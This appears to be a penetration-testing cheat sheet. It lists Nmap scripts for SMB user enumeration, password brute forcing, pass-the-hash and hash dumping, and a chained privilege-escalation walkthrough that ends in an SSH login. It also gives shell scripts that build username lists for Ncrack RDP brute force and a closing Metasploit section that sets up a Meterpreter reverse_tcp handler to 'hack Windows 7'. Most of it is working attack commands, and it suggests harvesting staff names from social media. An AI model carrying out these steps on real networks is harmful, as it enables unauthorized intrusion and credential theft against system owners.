Attempts to Guess Valid Credentials for the Citrix PN Web Agent XML Service:
nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080

Detect Zeus Botnet Members (by Querying the ZeuS Tracker Blocklist at abuse.ch) in the Specified Network (using the -PN Option as the Ping Response could be Disabled on the Host/Firewall):
nmap -v -sn -PN --script=dns-zeustracker

dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch A
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch TXT
dig +short domain_name.uribl.zeustracker.abuse.ch A
dig +short domain_name.uribl.zeustracker.abuse.ch TXT
# A response means that the IP address or domain is listed on the ZeuS Tracker.
# To check the IP address:
dig +short TXT
# To check the domain dantor777.com:
dig +short dantor777.com.uribl.zeustracker.abuse.ch A
dig +short dantor777.com.uribl.zeustracker.abuse.ch TXT

Perform a DNS Update (without Authentication):
nmap -sV --script=dns-update

Performs Password Guessing against the Apple Filing Protocol (AFP):
nmap -p 548 --script afp-brute

Shows AFP Shares and ACLs:
nmap -sV --script=afp-showmount

Listens for the LAN Sync Information Broadcasts that the Dropbox.com Client sends Every 20 Seconds, then Prints All the Discovered Client IP Addresses, Port Numbers, Version Numbers, Display Names, and more:
nmap -sV --script=broadcast-dropbox-listener

Discovers EMC Networker Backup Software Servers on a LAN by Sending a Network Broadcast Query:
nmap --script broadcast-networker-discover

Scan to Check the Windows Security Mode(s) Supported (for example, if Message Signing is not Supported, then Man-in-the-Middle Attacks are Possible):
nmap -p445 --script=smb-security-mode

Windows OS Discovery Scan:
nmap -p445 --script=smb-os-discovery

Windows Shares Enumeration Scan (without Specifying Credentials, or by Specifying a User and a Password or a Hash):
nmap -p445 --script=smb-enum-shares

by Specifying a User and a Password:
nmap -v -p445 --script=smb-enum-shares --script-args=smbuser=administrator,smbpass=blink182

by Specifying a User and a Hash with the "Pass the Hash" Technique (the Hash can be Obtained using fgdump or pwdump6, decrypted from the SAM file, or dumped with the "smb-pwdump.nse" script):
nmap -p445 --script=smb-enum-shares --script-args=smbuser=administrator,smbhash=cd401a40ae92face50b8e4fe1911060e

Password Hashes dumped this way from one Server can be used directly to access other Servers, without Cracking them: pass the Hash in an "smbhash" Argument instead of "smbpass".

Brute-Force Windows Account Passwords:
nmap -p445 --script=smb-brute.nse,smb-enum-shares

Attempt a Brute-Force Login to a Windows Account through SMB:
nmap -p445 --script=smb-brute

Windows Users Enumeration (using both SAMR and LSA):
nmap -v -p445 --script=smb-enum-users
nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139

Windows Sessions Enumeration:
nmap -vv -p445 --script=smb-enum-sessions

Windows Processes Enumeration:
nmap -vv -p445 --script=smb-enum-processes --script-args=smbuser=test,smbpass=test

Windows System Info:
nmap -p445 --script=smb-system-info --script-args=smbuser=test,smbpass=test

5 NMAP Attack Examples

5.1 Privilege Escalation

Perform a Ping Sweep to Check the Active IP Addresses in the Subnet:
nmap -sP

Determine the Remote Operating System:
nmap -O -v -oN versiondetect.txt

nmap -p445 --script=smb-os-discovery

Run Users Enumeration (and grep the Interesting Info):
nmap -p445 --script=smb-enum-users | grep -A1 "smb-enum-users"

Run smb-brute.nse with the User Names Obtained by the Previous Command:
nmap -p445 --script=smb-brute --script-args=userdb=usernames.txt | grep "^|_"

Perform a PWDUMP if the found User (in this example, "test") has Access to the Password File:
nmap -p445 --script=smb-pwdump --script-args=smbuser=test,smbpass=test,rcrack=rcrack,rtable=alpha/*.rt

The Downloaded Hashes are Saved in a File called "passwords.txt" and smb-brute.nse is re-run using the Hashes instead of the Default Password File:
cat passwords.txt
nmap -p445 --script=smb-brute --script-args=userdb=usernames.txt,passdb=passwords.txt

Run PWDUMP and Rainbow Crack with the Credentials of one of the Users, which will Download the Password Database from that System if that User has Sufficient Access:
nmap -p445 --script=smb-pwdump --script-args=smbuser=mary,smbhash=ADA65BF48C2CB30AE608489E290618AA,rcrack=rcrack,rtable=alpha/*.rt

As the Previous Command Determined the Hash and Cracked the Password of the User "jim", Test the Login:
ssh jim@<target>

5.2 NMAP the Target Network

Run a port scan:
nmap -p80 www.targetcompany.com/24

Scanning for port 80, while not a guarantee, helps to find all the hosts on the target network that are running Web servers. In addition to the public Web server there may be staging, development, backup or internal Web servers that are insecure or offer private information. Port 80 is also likely to be open on the firewall, because Web traffic generally passes over this port.
Nmap returns the IP address (X.X.X.03) of the target, potentially allowing you to scan the related class C address space (X.X.X.x). But first you must verify the class associated with the IP address. A popular method is to consult the whois service for the domain:
whois targetcompany.com

If you’re unable to identify the class of the network (as was the case here), the entire class C will have to be scanned:
nmap -v -p 80 X.X.X.1-254
nmap -v -p 53 -sU X.X.X.1-254
nmap -v -p 53 -sT X.X.X.1-254
nmap -v -p 25 X.X.X.1-254
nmap -v -p 110 X.X.X.1-254
nmap -v -p 143 X.X.X.1-254
nmap -v -p 139 X.X.X.1-254
nmap -v -p 445 X.X.X.1-254
nmap -v -p 3389 X.X.X.1-254
nmap -v -p 6000 X.X.X.1-254

You don't specify the protocol in the scan against port 80 (the Hyper-Text Transfer Protocol, or HTTP), because Nmap defaults to TCP (Transmission Control Protocol) and there is little reason to scan for UDP (User Datagram Protocol) on this port. In the subsequent scans against port 53 (the DNS port), both UDP and TCP were specified. Over this port, zone information, that is, the host-name-to-IP-address mappings for a zone, is exchanged between DNS servers and routers. Although DNS traffic is primarily UDP, it switches to TCP when the traffic is larger than 512 bytes.
If DNS traffic is allowed through the firewall, a zone transfer might be possible. It will succeed if the DNS server allows transfers to unauthorised requesters; however, many DNS servers now block zone transfers except to specifically authorised IP addresses.

Ports 25 (SMTP), 110 (POP3) and 143 (IMAP) reveal the presence of mail servers.

The checks of ports 139, 445 and 6000 are an attempt to guess the operating system from the services exposed. Port 139 (NetBIOS session service) and port 445 (SMB directly over TCP, available from Windows 2000/XP onwards) are typical of Windows hosts, while port 6000 (the X11 service) is typical of UNIX workstations. This is only a heuristic; the -O fingerprinting below gives a firmer answer. Identifying the operating system is a large step towards compromising the target, because the possible avenues of attack and the known vulnerabilities can then be narrowed down.
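The per-port sweeps above can be collapsed into one scan whose grepable output (-oG) is then queried once per service. The script below is an added example and is not part of the original page: sweep_targets runs the combined scan, hosts_with_open_port extracts the hosts on which a given port is open, and write_sample_gnmap writes a constructed -oG file (addresses in 192.0.2.0/24, a documentation range) so the extraction can be tried offline.

```shell
#!/bin/sh
# Added example (not from the original page): run the per-port sweeps from the
# section as ONE scan written in nmap's grepable format (-oG), then pull
# per-service host lists out of that file instead of re-scanning per port.
# The network, hosts and services in the sample below are constructed.

# sweep_targets <range> <gnmap file>: every port the section checks, in one
# run. -sS/-sU together scan TCP and UDP; the U:/T: prefixes split the list.
sweep_targets() {
    nmap -v -sS -sU -p U:53,T:25,53,80,110,139,143,445,3389,6000 -oG "$2" "$1"
}

# hosts_with_open_port <gnmap file> <port> [tcp|udp]: print the address of
# every host on which the port is open (protocol defaults to tcp).
# Grepable "Ports:" entries look like  80/open/tcp//http///  joined by ", ".
# Anchoring on the whitespace before the port keeps 389 from matching 3389.
hosts_with_open_port() {
    file=$1; port=$2; proto=${3:-tcp}
    grep '^Host:' "$file" \
        | grep -E "[[:space:]]${port}/open/${proto}/" \
        | awk '!seen[$2]++ { print $2 }'
}

# write_sample_gnmap <file>: a constructed -oG file in the real layout, so the
# extraction above can be exercised without a network.
write_sample_gnmap() {
    {
        printf '# Nmap 7.94 scan initiated ... as: nmap -v -sS -sU -p U:53,T:25,53,80,110,139,143,445,3389,6000 -oG sweep.gnmap 192.0.2.0/24\n'
        printf 'Host: 192.0.2.3 ()\tStatus: Up\n'
        printf 'Host: 192.0.2.3 ()\tPorts: 25/open/tcp//smtp///, 80/open/tcp//http///, 53/closed/tcp//domain///\tIgnored State: filtered (7)\n'
        printf 'Host: 192.0.2.10 ()\tStatus: Up\n'
        printf 'Host: 192.0.2.10 ()\tPorts: 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (7)\n'
        printf 'Host: 192.0.2.25 ()\tStatus: Up\n'
        printf 'Host: 192.0.2.25 ()\tPorts: 53/open/udp//domain///, 53/open/tcp//domain///, 6000/open/tcp//x11///\tIgnored State: closed (7)\n'
        printf '# Nmap done at ... -- 256 IP addresses (3 hosts up) scanned in 42.10 seconds\n'
    } > "$1"
}

# Usage: sh sweep.sh <gnmap file>   (after sweep_targets, or on the sample)
if [ -n "${1:-}" ]; then
    for p in 80 25 110 143 139 445 3389 6000; do
        echo "== hosts with tcp/$p open =="
        hosts_with_open_port "$1" "$p"
    done
    echo "== hosts with udp/53 open (zone-transfer candidates) =="
    hosts_with_open_port "$1" 53 udp
fi
```

Run against the sample, hosts_with_open_port lists 192.0.2.3 and 192.0.2.10 for tcp/80, 192.0.2.25 for udp/53, and nothing for tcp/3389; the same calls work unchanged on a file written by the real scan.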

To identify the operating system more reliably, run an Nmap OS detection scan and save the normal output to a file:
nmap -O -v -oN versiondetect.txt X.X.X.1-254

Once port 25 (SMTP) has been found open, identify the mail software and its version by connecting to the port with Telnet and reading the greeting:
telnet target_IP_address 25

You can also run netcat to grab the application/service banner:
nc www.targethost.com 25

The banner presented during the connection will generally reveal the product and, often, its exact version. There are many tools for capturing application banners, including the freeware netcat, MingSweeper and Fport for Windows, BannerGrab and the various banner grabbers at packetstormsecurity.org; Nmap's own -sV option performs the same probing automatically.
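Telnet is fine by hand, but in a sweep you want a grab that cannot hang on a silent port and that sends the small probe HTTP and SMTP need before they answer. The script below is an added example, not code from the original page: grab_banner wraps netcat with a 5-second bound, parse_banner normalises the first banner line into a "service detail" record for an inventory, and fingerprint chains the two. The host names and banners used for illustration are constructed.

```shell
#!/bin/sh
# Added example, not from the original page: a timeout-bounded banner grab with
# netcat that sends the probe HTTP and SMTP need, plus a parser that turns the
# first banner line into "<service> <detail>". Hosts/banners are constructed.

# grab_banner <host> <port>: print what the service sends within 5 seconds.
# SSH and SMTP greet first; HTTP says nothing until asked, so send a HEAD
# request and keep only the Server: header. nc -w bounds connect and the
# final read, so a port that accepts and stays silent cannot hang the sweep.
grab_banner() {
    host=$1; port=$2
    case $port in
        80|8080|8000)
            printf 'HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n' "$host" \
                | nc -w 5 "$host" "$port" | grep -i '^Server:' ;;
        25|587)
            # Say hello and leave, so the server closes the session itself.
            printf 'EHLO probe.example\r\nQUIT\r\n' | nc -w 5 "$host" "$port" ;;
        *)
            nc -w 5 "$host" "$port" </dev/null ;;
    esac
}

# parse_banner <line>: normalise one banner line into "<service> <detail>".
#   SSH-2.0-OpenSSH_9.2p1 Debian-2      -> ssh OpenSSH_9.2p1 Debian-2
#   220 mail.example.test ESMTP Postfix -> smtp mail.example.test ESMTP Postfix
#   Server: Apache/2.4.57 (Debian)      -> http Apache/2.4.57 (Debian)
# The SMTP greeting keeps the host name on purpose: it is often an internal
# name. Anything unrecognised is passed through tagged "unknown", not dropped.
parse_banner() {
    line=$(printf '%s' "$1" | tr -d '\r')
    case $line in
        SSH-*)           printf 'ssh %s\n' "${line#SSH-[12].[0-9]-}" ;;
        220\ *)          printf 'smtp %s\n' "${line#220 }" ;;
        [Ss]erver:\ *)   printf 'http %s\n' "${line#*: }" ;;
        *)               printf 'unknown %s\n' "$line" ;;
    esac
}

# fingerprint <host> <port>: grab, then parse the first line of the banner.
fingerprint() {
    parse_banner "$(grab_banner "$1" "$2" | head -n 1)"
}

# Usage: sh banner.sh <host> <port>
if [ $# -eq 2 ]; then
    fingerprint "$1" "$2"
fi
```

The parser is deliberately conservative: an unknown greeting such as a POP3 "+OK" line is reported as unknown with the raw text kept, so nothing is lost when the format is not one of the three handled.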

5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack

The Remote Desktop Protocol (RDP, TCP port 3389) is a possible way into a system during a penetration test, especially where accounts have weak passwords.

Use Nmap to ping-sweep the target network for live hosts, and write only the IP addresses extracted from the output into a file (-sn is the current spelling of the ping scan; the older -sP still works):
nmap -sn X.X.X.1-254 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > hosts_list.txt

Run an Nmap fast scan (-F, the 100 most common ports) on the live hosts, using the list generated by the previous command as the target list (-iL):
nmap -F -iL hosts_list.txt

As a cross-check, also scan specifically for open RDP ports, both across the whole range and on the live hosts (-p replaces -F, the two are not combined):
nmap -p 3389 X.X.X.1-254
nmap -v -iL hosts_list.txt -p 3389

Once Microsoft Terminal Services is found (ms-term-serv in older Nmap service tables, ms-wbt-server in current ones), compile a list of valid usernames for the password brute force in the following steps.
We can use username wordlists such as those you can download from these sites:
or we can use social engineering, finding the names of IT staff on LinkedIn or Facebook and guessing usernames from the company's naming convention or its e-mail address format, or, again, we can use Nmap to locate SMB servers on the target network, which can then be asked for user lists:
nmap -v -p445 X.X.X.1-254
nmap -v -sU -sS -p U:137,T:139 X.X.X.1-254
nmap -sS -O X.X.X.1-254 -p 139,445

then identify the SMB servers' OS, domain and NetBIOS details with the smb-os-discovery NSE script (or the Samba tools):
nmap --script smb-os-discovery.nse -p445 X.X.X.1-254
nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 X.X.X.1-254
nmblookup -A <host>
smbclient //servername-dt/share -I <host> -N

and then enumerate the Windows users over SMB with the smb-enum-users NSE script (it needs a null session or valid credentials, which the smb scripts accept through the smbusername and smbpassword script arguments):
nmap --script smb-enum-users.nse -p445 <host>
nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>

So, in the end, assume we have a users.txt text file with one username per line, like this:

We also need a wordlist.txt file with one candidate password per line (the same layout as users.txt); password dictionaries and wordlists can be downloaded from the links listed above.
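The username step above, from real names to the conventions a Windows domain typically uses, is mechanical and worth scripting. The script below is an added example, not code from the original page: gen_usernames derives candidates from "First Last" names (from LinkedIn, e-mail addresses or the smb-enum-users output), build_users_file puts already-confirmed accounts first and deduplicates, and audit_rdp hands the result to Ncrack. The names, the known-users file and the 192.0.2.10 target in the usage line are constructed.

```shell
#!/bin/sh
# Added example, not from the original page: derive username candidates from
# real names in the conventions most Windows shops use, merge in confirmed
# accounts, and feed the result to Ncrack as its -U file. Names are constructed.

# gen_usernames: read "First [Middle] Last" lines on stdin and print lowercase
# candidates: jsmith, john.smith, johnsmith, smithj, john_smith, john.
# Lines with a single word are skipped (NF >= 2); duplicates are removed.
gen_usernames() {
    tr 'A-Z' 'a-z' | awk 'NF >= 2 {
        f = $1; l = $NF; fi = substr(f, 1, 1)
        print fi l; print f "." l; print f l; print l fi; print f "_" l; print f
    }' | awk '!seen[$0]++'
}

# build_users_file <names file> <known users file or ""> <output file>:
# confirmed usernames (e.g. from smb-enum-users) go first so Ncrack tries them
# before the guesses; the merged list is deduplicated.
build_users_file() {
    {
        if [ -n "$2" ] && [ -f "$2" ]; then cat "$2"; fi
        gen_usernames < "$1"
    } | awk '!seen[$0]++' > "$3"
}

# audit_rdp <target> <users file> <wordlist>: one host at a time. CL=1 caps the
# connections to that host at one, which the RDP service copes with far better
# than a burst of parallel sessions; watch the domain lockout policy too, since
# every guess counts as a failed logon.
audit_rdp() {
    ncrack -vv -U "$2" -P "$3" "$1:3389,CL=1"
}

# Usage: sh users.sh names.txt known.txt users.txt
#        then: audit_rdp 192.0.2.10 users.txt wordlist.txt
if [ $# -eq 3 ]; then
    build_users_file "$1" "$2" "$3"
fi
```

The six patterns are the common ones; if the company's e-mail addresses show a different convention (first initial plus three letters of the surname, say), add it to the awk block rather than guessing across all of them, since every extra candidate multiplies the number of logon attempts.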

Download the latest Ncrack release for your operating system and install it, either from a binary package or by compiling it from source on Linux. For the binary package:
dpkg -i ncrack_0.4ALPHA-1_i386.deb

To compile from source, download the .tgz from the above link, create the /usr/local/share/ncrack directory, unpack the tarball into it, enter the directory the tarball creates, then configure, compile and install Ncrack:

mkdir -p /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz -C /usr/local/share/ncrack
cd /usr/local/share/ncrack/ncrack-0.4ALPHA
./configure
make
sudo make install

Run Ncrack against the Terminal Server hosts (one at a time), passing it the users.txt and wordlist.txt files and the target (change the IP address to match your environment; CL=1 caps the concurrent connections to that host at one, which keeps the RDP brute force stable):
ncrack -vv -U users.txt -P wordlist.txt <Target IP>:3389,CL=1

The Ncrack output shows which of the usernames are valid and which logins it cracked; the passwords of those users are weak. It also shows which users are restricted on the host and which have more privileges (such as the right to log on interactively).
Using the credentials of a user allowed to log on, connect to the host with a Remote Desktop client: on Windows the Microsoft Remote Desktop Connection client; on Linux Terminal Server Client, rdesktop, Remmina (my favourite, for the number of protocols supported and the features available) or PAC Manager; on Solaris rdesktop; on Mac the Microsoft Remote Desktop Connection client for Mac or CoRD.

Start the client from the GUI by double-clicking its icon, or from the command line; for example, with the Microsoft Remote Desktop Connection client on Windows:
%SystemRoot%\System32\mstsc.exe /v:<Target IP>

OR with rdesktop (-a sets the colour depth, -z enables compression, -g the window geometry, -5 RDP version 5 and -P persistent bitmap caching):
rdesktop -d domain -u username -p password -k en-us -a 16 -z -g 1024x768 -5 -P <Target IP>

OR with the default Remote Desktop client on a Mac:
open rdp://jsmith:<password>@<Target IP>

Once the connection opens and the logon succeeds, we're in.

5.4 Hacking Windows 7 with NMAP and Metasploit

Run an Nmap SYN (stealth) scan of the target network, skipping host discovery (-Pn, formerly spelled -PN):
nmap -sS -v -Pn 192.168.1.1-255

In msfconsole, select the generic payload handler:
use exploit/multi/handler

Set the attacker (listener) IP address and port:
set LHOST <Attacker IP>
set LPORT 5555

Set the reverse TCP packet payload:
set payload windows/meterpreter/reverse_tcp

Review the options and keep the handler listening after the first session arrives (by default it exits on the first session):
show options
set ExitOnSession false

Specify the target host IP address and port (multi/handler itself only listens for the connect-back; these values matter to the exploit module that delivers the payload):
set RHOST 192.xx.xx.xx
set RPORT 4321

Check the settings and start the handler:
show options
exploit